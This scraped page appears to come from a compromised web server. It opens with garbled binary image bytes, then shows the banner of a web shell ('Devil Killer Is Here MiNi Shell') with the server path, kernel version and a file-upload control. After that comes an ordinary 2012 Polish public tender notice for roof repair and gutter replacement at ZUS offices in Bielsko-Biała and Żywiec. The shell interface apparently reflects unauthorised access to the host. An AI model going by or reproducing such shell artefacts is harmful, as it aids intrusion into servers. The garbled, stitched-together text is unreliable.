JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120726/271552-N-2012.html

<p class="kh_header"><b>Bielsko-Biała: REMONT DACHU I WYMIANA OBRÓBEK BLACHARSKICH - ODDZIAŁ ZUS BIELSKO-BIAŁA, UL. KRASIŃSKIEGO 34.

MALOWANIE DACHU, WYMIANA RYNIEN I RUR SPUSTOWYCH - INSPEKTORAT ZUS ŻYWIEC, UL. PIERNIKARSKA 2.</b><br>
<b>Numer ogłoszenia: 271552 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Bielsku -Białej , ul. Krasińskiego 34, 43-300 Bielsko-Biała, woj. śląskie, tel. 33 825 27 15, faks 33 825 27 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DACHU I WYMIANA OBRÓBEK BLACHARSKICH - ODDZIAŁ ZUS BIELSKO-BIAŁA, UL. KRASIŃSKIEGO 34.

MALOWANIE DACHU, WYMIANA RYNIEN I RUR SPUSTOWYCH - INSPEKTORAT ZUS ŻYWIEC, UL. PIERNIKARSKA 2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest następujący zakres prac:

CZĘŚĆ I
Remont dachu, wymiana obróbek blacharskich w Oddziale ZUS w Bielsku-Białej, ul. Krasińskiego 34 - budynek A

ROBOTY ROZBIÓRKOWE
Rozebranie obróbek blacharskich kołnierzy, przy ścianie attyki, obróbka ścian maszynowni z blachy nienadającej się do użytku. 
Rozbiórka pokrycia z papy na dachach betonowych - papa termozgrzewalna.
Demontaż rur wywiewnych blaszanych
WYKONANIE POKRYĆ DACHOWYCH I OBRÓBEK
Wykonanie pokrycia z papy termozgrzewalnej dwuwarstwowe z wykonaniem warstwy gruntującej oraz zastosowanie w miejscach  styków z ścianą  i przy kominach izoklina styropianowego. 
Wykonanie obróbek kominów, przy ścianie attyki i maszynowni przy zastosowaniu papy termozgrzewalnej 
z  uszczelnieniem i spoinowaniem obróbek masą uszczelniającą i zabezpieczeniem krawędzi obróbek listwą
MALOWANIE OBRÓBEK
Dwukrotne malowanie obróbek blacharskich attyk oraz kołnierze kominów i wiatrownice na daszku maszynowni dźwigu osobowego, wywiewki wentylacyjne, stalowe okrągłe gołe z daszkiem na kominach w przewodach wentylacyjnych.
ROBOTY TOWARZYSZĄCE 
Uzupełnienie tynków zewnętrznych (na ścianie attyki nad dachem, ściana maszynowni nad dachem)
Częściowy remont instalacji odgromowej na dachu - przeczyszczenie przewodów, poprostowanie nie uszkadzając wsporników i złącz instalacji odgromowej na dachu.
ROBOTY TYMCZASOWE
Zabezpieczenie terenu robót poprzez oznakowanie i zabezpieczenie terenu przed dostępem osób postronnych
Usuwanie na bieżąco z obiektu i wywiezienie materiałów z demontażu, utylizacja papy.
Porządkowanie na bieżąco miejsca pracy i utrzymywanie czystości
Przy robotach demontażowych podejmowanie działań zabezpieczających obiekt przed możliwym zalaniem.

CZĘŚĆ II
Malowanie dachu, wymiana rynien i rur spustowych - Inspektorat ZUS w Żywcu, ul. Piernikarska 2 - budynek A i B

ROBOTY ROZBIÓRKOWE
Rozebranie rynien i rur spustowych z blachy nie nadającej się do użytku 
NAPRAWA DACHU
­Naprawa i uszczelnienie pokrycia dachowego polegająca na wycięciu i wstawieniu łat z zagruntowaniem powierzchni metalowych pod malowanie
MALOWANIE POKRYĆ DACHOWYCH I OBRÓBEK
Czyszczenie przez szczotkowanie mechaniczne do trzeciego stopnia czystości konstrukcji pełnościennych (stan wyjściowy powierzchni B) - powierzchnia dachu
Czyszczenie przez szczotkowanie ręczne do trzeciego stopnia czystości konstrukcji pełnościennych (stan wyjściowy powierzchni B) - powierzchnie obróbek kominów, attyk, ścian, wywiewek wentylacyjnych
Odtłuszczanie konstrukcji pełnościennych
Malowanie farbami  podkładowymi i nawierzchniowymi - połać dachowa, obróbki, drabinki przeciwśniegowe z wspornikami, malowanie wywiewek wentylacyjnych 
Rynny i rury spustowe z blachy powlekanej gr min.  0,50 mm
-Montaż nowych rynien śr. 150 i 120
-Montaż rur spustowych śr. 100, 120, 150
-Montaż zbiorniczków przy rynnach
ROBOTY TOWARZYSZĄCE I TYMCZASOWE
Zabezpieczenie terenu robót poprzez oznakowanie i zabezpieczenie terenu przed dostępem osób postronnych
Usuwanie na bieżąco z obiektu i wywiezienie materiałów z demontażu
Porządkowanie na bieżąco miejsca pracy i utrzymywanie czystości
Przy robotach demontażowych podejmowanie działań zabezpieczających przed możliwym zalaniem elewacji.

Szczegółowy zakres prac zawierają Specyfikacja Techniczna Wykonania i Odbioru Robót oraz przedmiar robót, które stanowią integralną część niniejszej SIWZ.

Wykonywanie robót - Przed podpisaniem umowy sporządzony zostanie harmonogram prac rzeczowo-finansowy z podziałem na etapy prac i podziałem na prace uciążliwe i nie uciążliwe dla Zamawiającego, ponieważ wszystkie prace będą wykonywane w obiekcie czynnym. Zamawiający nie dopuszcza możliwości wykonywania prac uciążliwych tj. rozbiórki, wiercenia, wykucia, zapylenia itp. w godzinach pracy Zakładu, prace muszą być wykonywane po godzinach urzędowania tj. po godz. 15.00, lecz nie dłużej niż do godziny 21.00, w dni wolne  w godzinach od 7.00 do 21.00. 
Wykonywanie czynności będących przedmiotem zamówienia w dni wolne od pracy nie wpłynie na wysokość wynagrodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:
część I
remont dachu, wymianę obróbek blacharskich w Oddziale ZUS Bielsko-Biała, ul. Krasińskiego 34 - budynek A:

2.079,19 zł ( słownie:  dwa tysiące siedemdziesiąt dziewięć złotych 19/100).

część II
malowanie dachu, wymiana rynien i rur spustowych w Inspektoracie ZUS w Żywcu, ul. Piernikarska 2 - budynek A i B.

593,80 zł ( słownie:  pięćset dziewięćdziesiąt trzy złote 80/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca posiada aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w  okresie  ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 zadania dotyczące robót odpowiadających swoim rodzajem pracom budowlanym stanowiącym przedmiot zamówienia w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  ( jedno zadanie = jedna umowa. W wykazie należy podać rodzaj i wartość zamówienia, datę oraz miejsce wykonania roboty);
     
        Na potwierdzenie tego warunku Wykonawca przedłoży:

-	Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonywanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania,
-	dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - minimum 2 zadania dotyczące robót odpowiadających swoim rodzajem pracom budowlanym stanowiącym przedmiot zamówienia w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  ( jedno zadanie = jedna umowa).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że osoba, która będzie sprawowała funkcję kierowniczą będzie posiadała:

-	uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2005r., Nr 156, poz. 1118 ze zm.) o specjalności w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	jest członkiem właściwej izby samorządu zawodowego.

Na potwierdzenie tego warunku Wykonawca przedłoży:

oświadczenie wg załącznika nr 6 do karty ofertowej Wykonawcy, że osoba sprawująca funkcję kierowniczą posiada wymagane uprawnienia i jest członkiem właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że osoba, która będzie sprawowała funkcję kierowniczą będzie posiadała:

-	uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2005r., Nr 156, poz. 1118 ze zm.) o specjalności w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	jest członkiem właściwej izby samorządu zawodowego.

Na potwierdzenie tego warunku Wykonawca przedłoży:

oświadczenie wg załącznika nr 6 do karty ofertowej Wykonawcy, że osoba sprawująca funkcję kierowniczą posiada wymagane uprawnienia i jest członkiem właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Wykonawca przedłoży:
      
oświadczenie złożone na podstawie art. 44 ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1  ustawy - załącznik nr 2 do karty ofertowej Wykonawcy;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Karta oferty Wykonawcy  ( zaleca się aby stanowił  stronę tytułową ); 

2.	Kosztorys ofertowy szczegółowy przygotowany na podstawie przedmiaru robót dołączonego do SIWZ. (Zaleca się zachowanie kolejności pozycji wyszczególnionych w  przedmiarze robót). 

3.	Karta zastosowanych materiałów - wykaz podstawowych materiałów zaoferowanych do wykonania zamówienia wycenionych w kosztorysie ofertowym z podaniem nazwy i producenta materiału - załącznik  nr  7 do karty ofertowej Wykonawcy.

4.	W przypadku sytuacji opisanych w rozdziale  III pkt 3 - zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

5.	W przypadku, gdy ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  - pełnomocnictwo określające zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

6.	W przypadku gdy Wykonawcę reprezentuję pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji.

7.	Zaleca się dołączenie do oferty kserokopii dokumentu potwierdzającego wniesienie wadium, jeżeli zostało wniesione w formie innej niż w pieniądzu;
8.	Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu sporządzone wg załącznika nr 4 do karty ofertowej Wykonawcy;
9.	Oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu sporządzone wg załącznika nr 5 do karty ofertowej Wykonawcy.
       
10.	Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w  art. 24 ust. 1 ustawy Prawo zamówień publicznych - załącznik  nr  1 do karty ofertowej Wykonawcy;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza następujące zmiany:
1)    zmiana terminu końcowego. Okolicznościami stanowiącymi podstawę zmiany terminu mogą być:
a)	warunki pogodowe uniemożliwiające prowadzenie robót zgodnie z ustaloną technologią,
b)	przerwanie prac przez właściwe organy administracji rządowej lub samorządowej albo jako   wykonanie prawomocnego orzeczenia sądu z przyczyn nie leżących po stronie Wykonawcy,
c)	konieczność wykonania części robót inną technologią niż założono,
d)	decyzji Zamawiającego zmieniającej termin zakończenia robót w związku z okolicznościami nie mającymi związku z prowadzonymi robotami budowlanymi, a wynikającymi z prowadzonej przez Zamawiającego działalności,
e)	wydłużenia czasu przekazania terenu budowy z przyczyn leżących po stronie Zamawiającego,
f)	napotkania w remontowanym obiekcie warunków fizycznych nieprzewidywalnych, mających wpływ na wydłużenie procesu inwestycyjnego,
g)	wystąpienie siły wyższej, której działanie uniemożliwiło terminową realizację przedmiotu zamówienia, działanie siły wyższej rozumiane jest jako wszelkie nadzwyczajne zdarzenia o charakterze zewnętrznym, niemożliwe do przewidzenia, takie jak katastrofy, pożary, powodzie, wybuchy, ataki terrorystyczne, niepokoje społeczne, strajki, z wyjątkiem strajku u Wykonawcy działania wojenne,
2)    zmiana godzin wykonywania robót budowlanych po uprzednim uzgodnieniu z Zamawiającym,
3)	zmiana lub wprowadzenie nowych podwykonawców pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w umowie,
4)	zmiana formy zabezpieczenia, na wniosek Wykonawcy, zgodnie z ustawą, pod warunkiem zachowania ciągłości zabezpieczenia i bez zmniejszenia jego wartości,
5)	aktualizacja harmonogramu wykonania robót w przypadku:
a)	zmiany terminu wprowadzonej zgodnie z ust. 1,
b)	skrócenie terminu realizacji umowy za zgodą Zamawiającego,
c)	uzyskania przez Zamawiającego dodatkowych środków na realizację umowy,
d)	zamiany terminów wykonania poszczególnych etapów robót z zachowaniem terminu końcowego.
2.	Zamawiający dopuszcza możliwość zmiany umowy w zakresie przeniesienia praw i obowiązków wynikających z umowy na osoby trzecie w zakresie cesji wierzytelności.
3.	Zmiana umowy wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
4.	Zmiana postanowień umowy następuje w formie pisemnej pod rygorem nieważności.
5.	Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca jak i Zamawiający.
6.	Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w budynku PTTK Bielsko-Biała, ul. Krasińskiego 38, w pokoju nr 206 (II p.), w Wieloosobowym Stanowisku Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: W siedzibie Zamawiającego w budynku PTTK Bielsko-Biała, ul. Krasińskiego 38, w pokoju nr 206 (II p.), w Wieloosobowym Stanowisku Zamówień Publicznych..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont dachu, wymiana obróbek blacharskich w Oddziale ZUS w Bielsku-Białej, ul. Krasińskiego 34 - budynek A.</p>
